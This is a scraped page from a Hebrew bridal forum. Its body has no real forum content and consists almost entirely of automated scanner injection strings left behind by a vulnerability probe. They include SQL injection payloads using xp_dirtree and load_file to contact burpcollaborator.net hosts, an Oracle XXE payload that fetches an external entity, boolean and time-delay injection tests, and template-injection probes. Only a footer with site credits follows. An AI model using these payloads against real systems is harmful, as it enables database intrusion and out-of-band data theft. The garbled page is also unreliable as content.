פורום כלות

de49b%>ef552'/"<c16b6    );exec master.dbo.xp_dirtree '\mg6blydk1phmom7mlk5jmkfgm7s7xvrjib66txhm.burpcollaborator.netyfq'--    %}a7559'/"<c6cf1    ';exec master.dbo.xp_dirtree '\2vyr0es0g5w232m200kz10uw1n7ncb6zxqll8cw1.burpcollaborator.netzjg'--    }}d8341'/"<ed772    ;exec master.dbo.xp_dirtree '\s5yha42qqv6sdswsaqupbq4mbdhdm1gp7fvai16q.burpcollaborator.netlhc'--    ' (select load_file('\\7s0wxjp5dat707j7x5h4y5r1ys4tuho5f833quej.burpcollaborator.net\ado')) '    ');exec master.dbo.xp_dirtree '\g9q5es6eujaghg0geeydfe8af1l2bq5ew7k27tvi.burpcollaborator.netmru'--    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % cuizi SYSTEM "http://shdhm4eq2visps8smq6pnqgmndtdy1spwdr0io7.burpcollaborator.net/">%cuizi;]>'),'/l') from dual)||'    b75a8%>dc293'/"<e2a59    );exec master.dbo.xp_dirtree '\rwrg13tphuxr4rnr1plo2pvl2c8dy1spjh7cu3is.burpcollaborator.net rw'--    %}fc6a3'/"<da824    ';exec master.dbo.xp_dirtree '\tmjir5jr7wntutdtrrbqsrlnseyfo3ir9ixdk48t.burpcollaborator.netlze'--    24ba383c624d571401    ;exec master.dbo.xp_dirtree '\378scf41s683f3y3c1w0d16xdojp9d31urim5dt2.burpcollaborator.netwh'--    }}e1657'/"<bc1e4    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % ilptu SYSTEM "http://ycenha9wx1dyky3yhw1viwbsijoke88wck77yvn.burpcollaborator.net/">%ilptu;]>'),'/l') from dual)||'    a842b%>df12f'/"<ba687    %}f2677'/"<f92bd    }}c0a61'/"<a748e    24ba383cf6a97dec17    ' (function(){if(typeof acd49==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);acd49=1;}}()) '    ' and 2094=2095--    ' and 2094=2094--    ' and '2094'='2095    ' and '2094'='2094    20174944' or 715=716--    20174944' or 715=715--    20174944' or '715'='716    20174944' or '715'='715    ' (select load_file('\\8t2xykq6ebu818k8y6i5z6s2zt5t8h15s8g33urj.burpcollaborator.net\vyo')) '    ');exec master.dbo.xp_dirtree '\3txsyfq1e6u313k3y1i0z1sxzo5o8c10stgo3fr4.burpcollaborator.netvt'--    );exec master.dbo.xp_dirtree '\727w7jz5na37a7t775r485118seshga41wprci07.burpcollaborator.netiuu'--    ';exec master.dbo.xp_dirtree '\nxoc2zuliqyn5non2lmk3lwh3898cw5kwbk67xvm.burpcollaborator.netgfo'--    ;exec master.dbo.xp_dirtree '\1moqrdjz74n1u1d1rzbyszlvsmym1auylo9jwakz.burpcollaborator.netylp'--    f8229%>be88f'/"<a31d7    %}fcfbb'/"<b8f4d    }}bb5cc'/"<d1590    ' (function(){if(typeof ae891==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);ae891=1;}}()) '    ' and 2867=2868--    ' and 2867=2867--    ' and '2867'='2868    ' and '2867'='2867    12423718' or 9554=9555--    12423718' or 9554=9554--    12423718' or '9554'='9555    12423718' or '9554'='9554    ' (select load_file('\\omedr0jm7rnouodormblsmlis9y90xvlmoajxalz.burpcollaborator.net\omp')) '    ');exec master.dbo.xp_dirtree '\lvka0xsjgowl3lml0jki1juf16769u4ivbj66xum.burpcollaborator.netze'--    );exec master.dbo.xp_dirtree '\d6k2bp3brg7dedxdbbvacb57cyiykmfa62uxho5d.burpcollaborator.netvec'--   
עוד ביטויים

כל הזכויות שמורות kala4kala.co.il
פיתוח: LotemX בניית אתרים ובניית רשת חברתית | עיצוב: 2pm
נכנסת להריון? מזל טוב! כנסי לאמא4אמא ותמצאי שם הכל החל ממחשבון הריון , פורום הריון , עגלות לתינוק , סלקלים ועוד זמן טעינה: 0.0532 שניות